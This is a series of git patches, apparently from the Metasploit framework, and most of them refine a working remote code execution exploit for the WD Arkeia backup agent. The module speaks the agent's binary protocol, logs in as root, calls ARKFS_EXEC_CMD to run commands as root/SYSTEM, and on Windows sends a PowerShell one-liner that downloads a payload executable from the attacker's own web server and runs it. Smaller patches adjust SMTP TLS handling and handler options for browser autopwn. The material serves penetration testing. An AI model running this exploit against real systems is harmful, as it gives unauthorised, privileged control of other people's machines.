@@ -92,11 +92,26 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    res = sock.recv(1024)
 
-    unless res and res[0,4] == "\x00\x60\x00\x04"
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #1")
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      return Exploit::CheckCode::Unknown
     end
 
     req = "\x00\x73"
@@ -105,11 +120,25 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    res = sock.recv(1024)
-
-    unless res and res[0,4] == "\x00\x60\x00\x04"
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #2")
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      return Exploit::CheckCode::Unknown
     end
 
     req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
@@ -117,11 +146,24 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    res = sock.recv(1024)
-
-    unless res and res == "\x00\x43\x00\x00\x00\x01\x00\x00"
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    unless data_length == 0
+      disconnect
+      return Exploit::CheckCode::Unknown
     end
 
     # ARKADMIN_GET_CLIENT_INFO
@@ -133,22 +175,124 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    res = sock.recv(1024)
 
-    unless res and res == "\x00\x43\x00\x00\x00\x02\x00\x00"
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+    unless data_length == 0
+      disconnect
+      return Exploit::CheckCode::Unknown
     end
 
     req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38"
     req << "\x00" * 12
 
     sock.put(req)
-    # Have to retrieve data twice
-    sock.recv(1024)
-    res = sock.recv(1024)
 
-    if res && res =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
+    # 1st packet
+
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x63\x00\x04"
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    # 2nd packet
+
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    # 3rd packet
+
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x65\x00\x04"
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length && data.include?('You have successfully retrieved client information')
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    # 4th packet
+
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x69\x00\x04"
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = sock.get_once(4)
+
+    unless data_length && data_length.length == 4
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    data_length = data_length[2..3].unpack('n')[0]
+
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      return Exploit::CheckCode::Unknown
+    end
+
+    if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
       version = $1
       vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
       if Gem::Version.new(version) <= Gem::Version.new('11.0.12')

From e1192c75a9babe39ce350096ac5df6ceb49c725c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 11:57:48 -0500
Subject: [PATCH 0702/1013] Fix network communication on `communicate`

* Some protocol handling just to not read amounts of data blindly
---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 173 +++++++++++++++---
 1 file changed, 145 insertions(+), 28 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 4c71953dcd..3dd14e8126 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -307,27 +307,26 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
     if target.name =~ /Windows/
 
-      @downfile = rand_text_alpha(8+rand(8))
+      @down_file = rand_text_alpha(8+rand(8))
       @pl = generate_payload_exe
 
       srv_host = Rex::Socket.source_address(rhost)
 
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + '/' + @downfile
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + '/' + @down_file
       print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
       start_service({'Uri' => {
         'Proc' => Proc.new { |cli, req|
           on_request_uri(cli, req)
         },
-        'Path' => '/' + @downfile
+        'Path' => '/' + @down_file
       }})
 
       # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
-      command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"http:$($s)$($s)#{srv_host}:#{datastore['SRVPORT']}$($s)#{@downfile}\\\";"
-      command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@downfile}.exe');"
-      command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@downfile}.exe');\""
+      command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"http:$($s)$($s)#{srv_host}:#{datastore['SRVPORT']}$($s)#{@down_file}\\\";"
+      command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
+      command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
 
       communicate(command)
 
@@ -360,22 +359,51 @@ class Metasploit3 < Msf::Exploit::Remote
       req << "\x00" * 11
 
       sock.put(req)
-      res = sock.recv(1024)
 
-      unless res and res[0,4] == "\x00\x60\x00\x04"
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x60\x00\x04"
         disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #1")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      end
+
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      data = sock.get_once(data_length)
+      unless data && data.length == data_length
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
       end
 
       req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
       req << "\x00" * 11
 
       sock.put(req)
-      res = sock.recv(1024)
-
-      unless res and res[0,4] == "\x00\x60\x00\x04"
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x60\x00\x04"
         disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #2")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      end
+
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      data = sock.get_once(data_length)
+      unless data && data.length == data_length
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
       end
 
       req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
@@ -385,11 +413,24 @@ class Metasploit3 < Msf::Exploit::Remote
       req << "\x00" * 11
 
       sock.put(req)
-      res = sock.recv(1024)
-
-      unless res and res == "\x00\x43\x00\x00\x00\x01\x00\x00"
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x43\x00\x00"
         disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      end
+
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      unless data_length == 0
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
       end
 
       req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
@@ -398,20 +439,36 @@ class Metasploit3 < Msf::Exploit::Remote
       req << "\x00" * 11
 
       sock.put(req)
-      res = sock.recv(1024)
 
-      unless res and res == "\x00\x43\x00\x00\x00\x02\x00\x00"
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x43\x00\x00"
         disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #4")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
       end
 
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      unless data_length == 0
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
+      end
+
+      req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
+      req << "\x00" * 11
+
+      sock.put(req)
 
       command_length = '%02x' % command.length
       command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
 
-      req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
-      req << "\x00" * 12
-      req << "\x64\x00\x04\x00\x04\x00"
+      req = "\x00\x64\x00\x04\x00\x04\x00"
       req << command_length # Maximum length can be 255 bytes (0xFF)
       req << command # Our command to be executed
       req << "\x00"
@@ -419,13 +476,73 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
 
       sock.put(req)
-      res = sock.recv(1024)
 
-      unless res and res[0,4] == "\x00\x63\x00\x04"
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x63\x00\x04"
         disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure executing payload")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
       end
 
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      data = sock.get_once(data_length)
+      unless data && data.length == data_length
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      end
+
+      # 1st Packet
+
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      end
+
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      data = sock.get_once(data_length)
+      unless data && data.length == data_length
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      end
+
+      # 2st Packet
+
+      id = sock.get_once(4)
+      unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      end
+
+      data_length = sock.get_once(4)
+
+      unless data_length && data_length.length == 4
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      end
+
+      data_length = data_length[2..3].unpack('n')[0]
+
+      data = sock.get_once(data_length)
+      unless data && data.length == data_length
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      end
 
       # Wait for our payload to be sent, else HTTP server might shutdown too quick
       select(nil, nil, nil, datastore['HTTP_DELAY'])
@@ -438,7 +555,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
     print_status("#{rhost}:#{rport} - Sending the payload to the server...")
-    register_files_for_cleanup("c:\\#{@downfile}.exe")
+    register_files_for_cleanup("c:\\#{@down_file}.exe")
     send_response(cli, @pl)
   end
 

From 493971245a417633d645baee9b0872b0e55274dc Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 10 Jul 2015 12:10:53 -0500
Subject: [PATCH 0703/1013] switch nsock locally to TLS - don't assume
 self.sock is set

---
 lib/msf/core/exploit/smtp_deliver.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb
index bb50767bc2..18fde235a0 100644
--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -84,7 +84,7 @@ module Exploit::Remote::SMTPDeliver
     if res =~ /STARTTLS/
       print_status("Starting tls")
       raw_send_recv("STARTTLS\r\n", nsock)
-      swap_sock_plain_to_ssl
+      swap_sock_plain_to_ssl(nsock)
       res = raw_send_recv("EHLO #{domain}\r\n", nsock)
     end
 

From 513dcf3574d838c1df6d3fd60cf5dfb5fbf8e823 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 10 Jul 2015 12:12:53 -0500
Subject: [PATCH 0704/1013] We don't need these methods anymore

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 40 -----------------------
 1 file changed, 40 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 9e59061fd3..9806cda682 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -558,46 +558,6 @@ module Msf
     end
 
 
-    # Prints all user-configurable payloads. It's the same as the "show payloads" command in console.
-    #
-    # @return [void]
-    def show_payloads
-      DEFAULT_PAYLOADS.keys.each do |platform|
-        payload_name = get_selected_payload_name(platform)
-        p = framework.payloads.create(payload_name)
-        next unless p
-        p.datastore['LHOST'] = get_payload_lhost
-        p.datastore['LPORT'] = get_selected_payload_lport(platform)
-        p_opt = Serializer::ReadableText.dump_options(p, '   ')
-        print("\nPayload options (#{payload_name}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
-      end
-    end
-
-
-    # Prints a message that explains how the user should set a payload. This is the same as the
-    # "set payload" command in console.
-    #
-    # @return [void]
-    def set_payload
-      print_status("'set payload' has been disabled for BrowserAutoPwn.")
-      print_status('You should set a platform-specific payload instead via advanced options:')
-      print_line
-      table = Rex::Ui::Text::Table.new(
-        'Header'  => 'Advanced Options',
-        'Indent'  => 1,
-        'Columns' => ['Option Name', 'Description']
-      )
-      DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
-        table << ["PAYLOAD_#{platform.to_s.upcase}", "Payload for #{platform} browser exploits"]
-      end
-      print_line(table.to_s)
-      print_status("Example: set PAYLOAD_WIN windows/meterpreter/reverse_tcp")
-      print_line
-      print_status("For a list of payloads, you can do: show payloads")
-      print_status("You can also see 'show advanced' for more options.")
-    end
-
-
     # Returns a list of suitable exploits for the current client based on what #sort_bap_exploits
     # gives us. It will do a global exploitable requirement check (the best it can do). There's
     # actually a target-specific exploitable requirement check too, but that is performed in

From 086de2c030336d8068f6fd08a93de3bf94d98f2a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 10 Jul 2015 12:39:43 -0500
Subject: [PATCH 0705/1013] Pass more options

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 9806cda682..4b90d7fbf9 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -325,6 +325,15 @@ module Msf
         multi_handler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript'] if datastore['InitialAutoRunScript']
         multi_handler.datastore['AutoRunScript']        = datastore['AutoRunScript'] if datastore['AutoRunScript']
         multi_handler.datastore['CAMPAIGN_ID']          = datastore['CAMPAIGN_ID'] if datastore['CAMPAIGN_ID']
+        multi_handler.datastore['HandlerSSLCert']       = datastore['HandlerSSLCert'] if datastore['HandlerSSLCert']
+        multi_handler.datastore['StagerVerifySSLCert']  = datastore['StagerVerifySSLCert'] if datastore['StagerVerifySSLCert']
+        multi_handler.datastore['PayloadUUIDTracking']  = datastore['PayloadUUIDTracking'] if datastore['PayloadUUIDTracking']
+        multi_handler.datastore['PayloadUUIDName']      = datastore['PayloadUUIDName'] if datastore['PayloadUUIDName']
+        multi_handler.datastore['IgnoreUnknownPayloads'] = datastore['IgnoreUnknownPayloads'] if datastore['IgnoreUnknownPayloads']
+        multi_handler.datastore['SessionRetryTotal']     = datastore['SessionRetryTotal'] if datastore['SessionRetryTotal']
+        multi_handler.datastore['SessionRetryWait']      = datastore['SessionRetryWait'] if datastore['SessionRetryWait']
+        multi_handler.datastore['SessionExpirationTimeout'] = datastore['SessionExpirationTimeout'] if datastore['SessionExpirationTimeout']
+        multi_handler.datastore['SessionCommunicationTimeout'] = datastore['SessionCommunicationTimeout'] if datastore['SessionCommunicationTimeout']
 
 
         # TODO: Pass WORKSPACE and other options down to the sub module

From c9d2ab58d35e4194acdd8a53340af52d99816b4b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 12:48:21 -0500
Subject: [PATCH 0706/1013] Use HttpServer::HTML

* And make the exploit Aggressive
---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 360 +++++++++---------
 1 file changed, 175 insertions(+), 185 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 3dd14e8126..305517653c 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -9,11 +9,10 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
-
   def initialize(info = {})
     super(update_info(info,
       'Name'        => 'WD Arkeia Remote Code Execution',
@@ -35,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
         ],
       'Privileged'  => true,
+      'Stance'      => Msf::Exploit::Stance::Aggressive,
       'Payload'     =>
         {
           'DisableNops' => true
@@ -312,251 +312,241 @@ class Metasploit3 < Msf::Exploit::Remote
       @down_file = rand_text_alpha(8+rand(8))
       @pl = generate_payload_exe
 
-      srv_host = Rex::Socket.source_address(rhost)
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + '/' + @down_file
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-        'Path' => '/' + @down_file
-      }})
-
-      # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
-      command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"http:$($s)$($s)#{srv_host}:#{datastore['SRVPORT']}$($s)#{@down_file}\\\";"
-      command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
-      command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
-
-      communicate(command)
-
+      begin
+        Timeout.timeout(datastore['HTTP_DELAY']) {super}
+      rescue Timeout::Error
+      end
     elsif target.name =~ /Linux/
       communicate(payload.encoded)
       return
     end
   end
 
+  def primer
+    @payload_url = get_uri
+
+    # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
+    command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
+    command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
+    command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
+
+    communicate(command)
+  end
 
   def communicate(command)
-      print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
+    print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
 
-      connect
+    connect
 
-      print_status("#{rhost}:#{rport} - Sending agent communication")
+    print_status("#{rhost}:#{rport} - Sending agent communication")
 
-      req = "\x00\x41\x00\x00\x00\x00\x00\x70"
-      req << "\x00" * 12
-      req << "\xc0\xa8\x02\x8a"
-      req << "\x00" * 56
-      req << "\x8a\x02\xa8\xc0"
-      req << 'ARKFS'
-      req << "\x00"
-      req << 'root'
-      req << "\x00"
-      req << 'root'
-      req << "\x00" * 3
-      req << '4.3.0-1' # Client version ?
-      req << "\x00" * 11
+    req = "\x00\x41\x00\x00\x00\x00\x00\x70"
+    req << "\x00" * 12
+    req << "\xc0\xa8\x02\x8a"
+    req << "\x00" * 56
+    req << "\x8a\x02\xa8\xc0"
+    req << 'ARKFS'
+    req << "\x00"
+    req << 'root'
+    req << "\x00"
+    req << 'root'
+    req << "\x00" * 3
+    req << '4.3.0-1' # Client version ?
+    req << "\x00" * 11
 
-      sock.put(req)
+    sock.put(req)
 
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x60\x00\x04"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      data = sock.get_once(data_length)
-      unless data && data.length == data_length
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
-      end
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+    end
 
-      req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
-      req << "\x00" * 11
+    req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
+    req << "\x00" * 11
 
-      sock.put(req)
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x60\x00\x04"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    sock.put(req)
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      data = sock.get_once(data_length)
-      unless data && data.length == data_length
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
-      end
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+    end
 
-      req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
-      req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
-      req << "\x00"
-      req << 'EN' # English language?
-      req << "\x00" * 11
+    req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
+    req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
+    req << "\x00"
+    req << 'EN' # English language?
+    req << "\x00" * 11
 
-      sock.put(req)
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x43\x00\x00"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    sock.put(req)
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      unless data_length == 0
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
-      end
+    unless data_length == 0
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
+    end
 
-      req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
-      req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
-      req << "\x00\x31"
-      req << "\x00" * 11
+    req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
+    req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
+    req << "\x00\x31"
+    req << "\x00" * 11
 
-      sock.put(req)
+    sock.put(req)
 
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x43\x00\x00"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      unless data_length == 0
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
-      end
+    unless data_length == 0
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
+    end
 
